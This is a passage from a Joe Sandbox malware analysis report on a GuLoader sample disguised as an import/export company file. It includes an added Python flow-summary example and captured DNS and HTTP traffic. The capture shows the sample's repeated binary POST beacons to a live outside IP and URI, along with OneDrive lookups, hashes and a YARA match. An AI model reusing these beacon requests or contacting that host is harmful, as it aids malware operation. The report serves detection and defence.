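The table above is four short TCP connections from the same client to 185.227.139.18:80, opened roughly 1.2 to 1.4 seconds apart. The following is an added example, not part of the Joe Sandbox report, that summarises such rows as flows: packet count per connection, the handshake round-trip (first server packet minus the first client packet) and the spacing between connection starts. SAMPLE_ROWS carries the report's five columns re-typed as "timestamp  src_ip:port -> dst_ip:port" and holds only the first packets of the 49753, 49754 and 49755 connections; the remaining rows are left out to keep the sample short. All rows share one day and time zone, so the zone label is dropped during parsing (an assumption for other inputs).

```python
"""Flow summary over rows of a sandbox TCP packet table (added example)."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime
from typing import Optional

# Copied from the report's TCP Packets table (subset), re-typed in the form
# "<timestamp>  <src ip>:<src port> -> <dst ip>:<dst port>".
SAMPLE_ROWS = """\
Aug 3, 2021 08:12:26.496088028 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.639414072 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:26.639549971 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.643964052 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.786485910 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:26.786619902 CEST  192.168.2.3:49753 -> 185.227.139.18:80
Aug 3, 2021 08:12:26.930691957 CEST  185.227.139.18:80 -> 192.168.2.3:49753
Aug 3, 2021 08:12:27.841173887 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.983741999 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:27.983902931 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:27.995006084 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.137423038 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:28.138072014 CEST  192.168.2.3:49754 -> 185.227.139.18:80
Aug 3, 2021 08:12:28.280507088 CEST  185.227.139.18:80 -> 192.168.2.3:49754
Aug 3, 2021 08:12:29.057308912 CEST  192.168.2.3:49755 -> 185.227.139.18:80
Aug 3, 2021 08:12:29.199930906 CEST  185.227.139.18:80 -> 192.168.2.3:49755
Aug 3, 2021 08:12:29.200562000 CEST  192.168.2.3:49755 -> 185.227.139.18:80
"""


def parse_ts(text: str) -> datetime:
    """'Aug 3, 2021 08:12:26.496088028 CEST' -> naive datetime. The nine-digit
    fraction is truncated to microseconds (datetime's resolution); the zone
    label is ignored because every row of the table shares it."""
    base, rest = text.split(".", 1)
    frac = rest.split(" ", 1)[0]
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(
        microsecond=int(frac[:6].ljust(6, "0")))


def endpoint(text: str) -> tuple[str, int]:
    ip, port = text.rsplit(":", 1)
    return ip, int(port)


@dataclass
class Flow:
    client: tuple[str, int]   # the side that sent the first packet seen
    server: tuple[str, int]
    first: datetime
    last: datetime
    packets: int = 0
    handshake_rtt: Optional[float] = None   # seconds, first server packet minus first packet


def summarise_flows(rows: str) -> list[Flow]:
    """Group rows by unordered endpoint pair; the first packet names the client."""
    flows: dict[frozenset, Flow] = {}
    for line in rows.splitlines():
        if not line.strip():
            continue
        ts_text, ends = line.split("  ", 1)
        src_text, dst_text = ends.split(" -> ")
        ts, src, dst = parse_ts(ts_text), endpoint(src_text), endpoint(dst_text)
        key = frozenset((src, dst))
        flow = flows.get(key)
        if flow is None:
            flow = flows[key] = Flow(client=src, server=dst, first=ts, last=ts)
        flow.packets += 1
        flow.last = ts
        if flow.handshake_rtt is None and src == flow.server:
            flow.handshake_rtt = (ts - flow.first).total_seconds()
    return sorted(flows.values(), key=lambda f: f.first)


def start_intervals(flows: list[Flow]) -> list[float]:
    """Seconds between the starts of consecutive flows (connection cadence)."""
    return [(b.first - a.first).total_seconds() for a, b in zip(flows, flows[1:])]


if __name__ == "__main__":
    found = summarise_flows(SAMPLE_ROWS)
    for f in found:
        print(f"{f.client[0]}:{f.client[1]} -> {f.server[0]}:{f.server[1]}  "
              f"packets={f.packets}  rtt={f.handshake_rtt:.3f}s  "
              f"duration={(f.last - f.first).total_seconds():.3f}s")
    print("start intervals:", [round(i, 3) for i in start_intervals(found)])
```

The handshake RTT comes out close to 143 ms for every connection in the table, which is consistent with a real remote host rather than a sinkhole answering from the sandbox network; the near-constant spacing between connection starts is the cadence a network detection can key on once the request content itself is unavailable (for example when the same loader is later seen over TLS).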

            UDP Packets

Timestamp  Source IP:port -> Destination IP:port
Aug 3, 2021 08:06:02.561711073 CEST  192.168.2.3:64185 -> 8.8.8.8:53
Aug 3, 2021 08:06:02.587394953 CEST  8.8.8.8:53 -> 192.168.2.3:64185
Aug 3, 2021 08:06:03.523422003 CEST  192.168.2.3:65110 -> 8.8.8.8:53
Aug 3, 2021 08:06:03.549778938 CEST  8.8.8.8:53 -> 192.168.2.3:65110
Aug 3, 2021 08:06:04.874326944 CEST  192.168.2.3:58361 -> 8.8.8.8:53
Aug 3, 2021 08:06:04.906574965 CEST  8.8.8.8:53 -> 192.168.2.3:58361
Aug 3, 2021 08:06:07.017973900 CEST  192.168.2.3:63492 -> 8.8.8.8:53
Aug 3, 2021 08:06:07.053630114 CEST  8.8.8.8:53 -> 192.168.2.3:63492
Aug 3, 2021 08:06:08.382019043 CEST  192.168.2.3:60831 -> 8.8.8.8:53
Aug 3, 2021 08:06:08.416337013 CEST  8.8.8.8:53 -> 192.168.2.3:60831
Aug 3, 2021 08:06:10.325537920 CEST  192.168.2.3:60100 -> 8.8.8.8:53
Aug 3, 2021 08:06:10.350493908 CEST  8.8.8.8:53 -> 192.168.2.3:60100
Aug 3, 2021 08:06:15.376889944 CEST  192.168.2.3:53195 -> 8.8.8.8:53
Aug 3, 2021 08:06:15.402035952 CEST  8.8.8.8:53 -> 192.168.2.3:53195
Aug 3, 2021 08:06:17.162555933 CEST  192.168.2.3:50141 -> 8.8.8.8:53
Aug 3, 2021 08:06:17.190224886 CEST  8.8.8.8:53 -> 192.168.2.3:50141
Aug 3, 2021 08:06:27.280474901 CEST  192.168.2.3:53023 -> 8.8.8.8:53
Aug 3, 2021 08:06:27.307948112 CEST  8.8.8.8:53 -> 192.168.2.3:53023
Aug 3, 2021 08:06:29.274162054 CEST  192.168.2.3:49563 -> 8.8.8.8:53
Aug 3, 2021 08:06:29.309591055 CEST  8.8.8.8:53 -> 192.168.2.3:49563
Aug 3, 2021 08:06:30.392318964 CEST  192.168.2.3:51352 -> 8.8.8.8:53
Aug 3, 2021 08:06:30.428770065 CEST  8.8.8.8:53 -> 192.168.2.3:51352
Aug 3, 2021 08:06:31.567733049 CEST  192.168.2.3:59349 -> 8.8.8.8:53
Aug 3, 2021 08:06:31.604064941 CEST  8.8.8.8:53 -> 192.168.2.3:59349
Aug 3, 2021 08:06:32.395380974 CEST  192.168.2.3:57084 -> 8.8.8.8:53
Aug 3, 2021 08:06:32.421241045 CEST  8.8.8.8:53 -> 192.168.2.3:57084
Aug 3, 2021 08:06:34.095387936 CEST  192.168.2.3:58823 -> 8.8.8.8:53
Aug 3, 2021 08:06:34.122996092 CEST  8.8.8.8:53 -> 192.168.2.3:58823
Aug 3, 2021 08:06:35.255598068 CEST  192.168.2.3:57568 -> 8.8.8.8:53
Aug 3, 2021 08:06:35.293929100 CEST  8.8.8.8:53 -> 192.168.2.3:57568
Aug 3, 2021 08:06:36.004561901 CEST  192.168.2.3:50540 -> 8.8.8.8:53
Aug 3, 2021 08:06:36.054364920 CEST  8.8.8.8:53 -> 192.168.2.3:50540
Aug 3, 2021 08:06:36.325654984 CEST  192.168.2.3:54366 -> 8.8.8.8:53
Aug 3, 2021 08:06:36.350203037 CEST  8.8.8.8:53 -> 192.168.2.3:54366
Aug 3, 2021 08:06:38.112377882 CEST  192.168.2.3:53034 -> 8.8.8.8:53
Aug 3, 2021 08:06:38.144728899 CEST  8.8.8.8:53 -> 192.168.2.3:53034
Aug 3, 2021 08:07:06.873698950 CEST  192.168.2.3:57762 -> 8.8.8.8:53
Aug 3, 2021 08:07:06.909287930 CEST  8.8.8.8:53 -> 192.168.2.3:57762
Aug 3, 2021 08:07:07.608310938 CEST  192.168.2.3:55435 -> 8.8.8.8:53
Aug 3, 2021 08:07:07.643776894 CEST  8.8.8.8:53 -> 192.168.2.3:55435
Aug 3, 2021 08:07:08.167875051 CEST  192.168.2.3:50713 -> 8.8.8.8:53
Aug 3, 2021 08:07:08.203213930 CEST  8.8.8.8:53 -> 192.168.2.3:50713
Aug 3, 2021 08:07:08.591665983 CEST  192.168.2.3:56132 -> 8.8.8.8:53
Aug 3, 2021 08:07:08.626812935 CEST  8.8.8.8:53 -> 192.168.2.3:56132
Aug 3, 2021 08:07:09.066729069 CEST  192.168.2.3:58987 -> 8.8.8.8:53
Aug 3, 2021 08:07:09.099097013 CEST  8.8.8.8:53 -> 192.168.2.3:58987
Aug 3, 2021 08:07:09.610244036 CEST  192.168.2.3:56579 -> 8.8.8.8:53
Aug 3, 2021 08:07:09.635169983 CEST  8.8.8.8:53 -> 192.168.2.3:56579
Aug 3, 2021 08:07:10.153930902 CEST  192.168.2.3:60633 -> 8.8.8.8:53
Aug 3, 2021 08:07:10.186781883 CEST  8.8.8.8:53 -> 192.168.2.3:60633
Aug 3, 2021 08:07:10.913202047 CEST  192.168.2.3:61292 -> 8.8.8.8:53
Aug 3, 2021 08:07:10.938419104 CEST  8.8.8.8:53 -> 192.168.2.3:61292
Aug 3, 2021 08:07:12.204030991 CEST  192.168.2.3:63619 -> 8.8.8.8:53
Aug 3, 2021 08:07:12.239463091 CEST  8.8.8.8:53 -> 192.168.2.3:63619
Aug 3, 2021 08:07:12.693355083 CEST  192.168.2.3:64938 -> 8.8.8.8:53
Aug 3, 2021 08:07:12.727677107 CEST  8.8.8.8:53 -> 192.168.2.3:64938
Aug 3, 2021 08:07:13.902677059 CEST  192.168.2.3:61946 -> 8.8.8.8:53
Aug 3, 2021 08:07:13.944535971 CEST  8.8.8.8:53 -> 192.168.2.3:61946
Aug 3, 2021 08:07:22.200280905 CEST  192.168.2.3:64910 -> 8.8.8.8:53
Aug 3, 2021 08:07:22.240190029 CEST  8.8.8.8:53 -> 192.168.2.3:64910
Aug 3, 2021 08:07:41.223428011 CEST  192.168.2.3:52123 -> 8.8.8.8:53
Aug 3, 2021 08:07:41.272118092 CEST  8.8.8.8:53 -> 192.168.2.3:52123
Aug 3, 2021 08:10:57.579036951 CEST  192.168.2.3:56130 -> 8.8.8.8:53
Aug 3, 2021 08:10:57.614332914 CEST  8.8.8.8:53 -> 192.168.2.3:56130
Aug 3, 2021 08:10:58.213329077 CEST  192.168.2.3:56338 -> 8.8.8.8:53
Aug 3, 2021 08:10:58.247992992 CEST  8.8.8.8:53 -> 192.168.2.3:56338
Aug 3, 2021 08:11:06.469744921 CEST  192.168.2.3:59420 -> 8.8.8.8:53
Aug 3, 2021 08:11:06.503454924 CEST  8.8.8.8:53 -> 192.168.2.3:59420
Aug 3, 2021 08:11:10.841893911 CEST  192.168.2.3:58784 -> 8.8.8.8:53
Aug 3, 2021 08:11:10.874582052 CEST  8.8.8.8:53 -> 192.168.2.3:58784
Aug 3, 2021 08:11:11.153975010 CEST  192.168.2.3:63978 -> 8.8.8.8:53
Aug 3, 2021 08:11:11.178591967 CEST  8.8.8.8:53 -> 192.168.2.3:63978
Aug 3, 2021 08:12:22.548403978 CEST  192.168.2.3:62938 -> 8.8.8.8:53
Aug 3, 2021 08:12:22.608761072 CEST  8.8.8.8:53 -> 192.168.2.3:62938
Aug 3, 2021 08:12:23.496463060 CEST  192.168.2.3:55708 -> 8.8.8.8:53
Aug 3, 2021 08:12:23.536290884 CEST  8.8.8.8:53 -> 192.168.2.3:55708
Aug 3, 2021 08:13:14.448586941 CEST  192.168.2.3:56803 -> 8.8.8.8:53
Aug 3, 2021 08:13:14.495676994 CEST  8.8.8.8:53 -> 192.168.2.3:56803

            DNS Queries

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
            Aug 3, 2021 08:12:22.548403978 CEST | 192.168.2.3 | 8.8.8.8 | 0xb178 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
            Aug 3, 2021 08:12:23.496463060 CEST | 192.168.2.3 | 8.8.8.8 | 0xf31d | Standard query (0) | mbdetq.dm.files.1drv.com | A (IP address) | IN (0x0001)

            DNS Answers

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
            Aug 3, 2021 08:10:57.614332914 CEST | 8.8.8.8 | 192.168.2.3 | 0xf08c | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
            Aug 3, 2021 08:12:22.608761072 CEST | 8.8.8.8 | 192.168.2.3 | 0xb178 | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
            Aug 3, 2021 08:12:23.536290884 CEST | 8.8.8.8 | 192.168.2.3 | 0xf31d | No error (0) | mbdetq.dm.files.1drv.com | dm-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
            Aug 3, 2021 08:12:23.536290884 CEST | 8.8.8.8 | 192.168.2.3 | 0xf31d | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)

            HTTP Request Dependency Graph

            • 185.227.139.18

            HTTP Packets

            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            0 | 192.168.2.3 | 49753 | 185.227.139.18 | 80 | C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Timestamp | kBytes transferred | Direction | Data
            Aug 3, 2021 08:12:26.643964052 CEST | 5872 | OUT | POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 190
            Connection: close
            Aug 3, 2021 08:12:27.484879971 CEST | 5874 | IN | HTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:26 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            1 | 192.168.2.3 | 49754 | 185.227.139.18 | 80 | C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Timestamp | kBytes transferred | Direction | Data
            Aug 3, 2021 08:12:27.995006084 CEST | 5884 | OUT | POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 190
            Connection: close
            Aug 3, 2021 08:12:28.866781950 CEST | 5886 | IN | HTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:28 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            2 | 192.168.2.3 | 49755 | 185.227.139.18 | 80 | C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Timestamp | kBytes transferred | Direction | Data
            Aug 3, 2021 08:12:29.223743916 CEST | 5896 | OUT | POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 163
            Connection: close
            Aug 3, 2021 08:12:30.140487909 CEST | 5898 | IN | HTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:29 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            3 | 192.168.2.3 | 49756 | 185.227.139.18 | 80 | C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Timestamp | kBytes transferred | Direction | Data
            Aug 3, 2021 08:12:30.628950119 CEST | 5908 | OUT | POST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 163
            Connection: close
            Aug 3, 2021 08:12:31.508862972 CEST | 5910 | IN | HTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:30 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Code Manipulations

            Statistics

            Behavior

            System Behavior

            General

            Start time:08:06:08
            Start date:03/08/2021
            Path:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
            Imagebase:0x400000
            File size:147456 bytes
            MD5 hash:0153AE8CF4B1F546721332B5CB3F973C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Visual Basic
            Yara matches:
            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:08:09:12
            Start date:03/08/2021
            Path:C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
            Imagebase:0x400000
            File size:147456 bytes
            MD5 hash:0153AE8CF4B1F546721332B5CB3F973C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Disassembly

            Code Analysis
